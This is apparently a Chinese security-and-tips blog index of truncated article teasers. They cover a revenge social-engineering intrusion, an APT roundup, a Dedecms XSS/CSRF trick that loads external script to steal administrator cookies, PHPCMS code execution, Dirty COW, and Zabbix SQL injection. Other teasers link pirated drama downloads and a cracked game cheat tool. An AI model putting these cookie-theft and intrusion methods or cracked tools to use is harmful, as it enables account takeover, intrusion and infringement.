网络事件说

球球大作战被骗球后的"愤怒"社工、渗透攻击

难易程度:★★★阅读点:社工渗透文章作者:gh0stkey文章来源:i春秋关键字:渗透社工 0x00 背景 作为一名职业...继续阅读 »
网络事件说

2016上半年十大APT攻击组织大盘点

近几年来,APT攻击事件此起彼伏,从针对乌克兰国家电网的网络攻击事件,到孟加拉国央行被黑客攻击导致8100元美元被窃取,APT攻击以其无孔不入的触角延伸到了全世界各地,几乎所有的重要行业如政府、金融、电力、教育都受到了APT攻击的威胁。神秘的APT攻击从攻...继续阅读 »
网络渗透漏洞

Dedecms通用XSS+CSRF#前台获取管理员cookie

Dedecms的后台搜索的地方存在反射xss,但是我们可以构造src地址,让他加载代码。 这里我利用xss平台来外部加载一串js代码来获取cookie并发送到xss平台 payload: <script src=h...继续阅读 »
网络技巧说

苹果手机不越狱虚拟定位教程 包括ios10通用

IOS10出来一段时间了,越狱工具迟迟没出来,想要虚拟定位的就往下看本教程吧,此定位支持任何第三方app 原理说明:通过修改备份数据里的地图数据来,来使自带地图增加一个虚拟定位的按钮来实现的。 除了ios10以外,ios9也试用...继续阅读 »
网络渗透漏洞

PHPCMS V9 版本后台设计缺陷导致任意代码执行漏洞

0x01 背景 由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~ PS:使用的测试环境是php5.6(已经移除gpc选项) ...继续阅读 »
网络渗透漏洞

深入解读脏牛Linux本地提权漏洞(CVE-2016-5195)

摘要:0x00 概述 该漏洞是Linux的一个本地提权漏洞,发现者是Phil Oester,影响=2.6.22的所有Linux内核版本,修复时间是2016年10月18号。该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下...继续阅读 »
网络技巧说

收集整理:百度搜索URL参数详解

http://www.baidu.com/s?wd=关键字 wd(Keyword):查询的关键词; http://www.baidu.com/s?wd=关键字&cl=3 cl(Class):搜索类型,cl=3为网...继续阅读 »
网络事件说

Zabbix爆出高危SQL注入漏洞,可获操作系统权限

漏洞概述 zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取za...继续阅读 »
模板电影网剧

灵魂摆渡3全集超级云盘资源+种子

如果网盘链接失效请下载种子自行离线网盘 链接: https://pan.baidu.com/s/1c2C828C 密码: uhac 种子:http://www.putao9.org/2016/lh...继续阅读 »
网络技巧说

QQ游戏大厅你画我猜辅助破解版 撩妹神器

已测试百分百可用无后门,切勿倒卖,仅供交流学习使用 感谢QQ:11414603投稿 提示一下:出现"运行时出错" 不要点确定 搁在旁边就行 软件可以继续使用功能! 软件永久可用,没带眼睛,别下载,连个文件替换都不会 ...继续阅读 »
网络技巧说

SharpDevelop---精简的C#开发工具

一般试用C#语言来做开发,都会装个微软的virtual studio;但是作为业余爱好,想玩玩C#开发,但又不想装那么庞大的软件,那么就有这么一款精简(才十几兆)的替代品(SharpDevelop)可以解决这个问题了。 去...继续阅读 »